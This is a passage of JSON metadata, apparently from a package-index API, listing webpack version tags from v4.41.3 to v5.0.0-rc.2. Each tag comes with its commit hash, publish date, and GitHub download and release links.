s/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5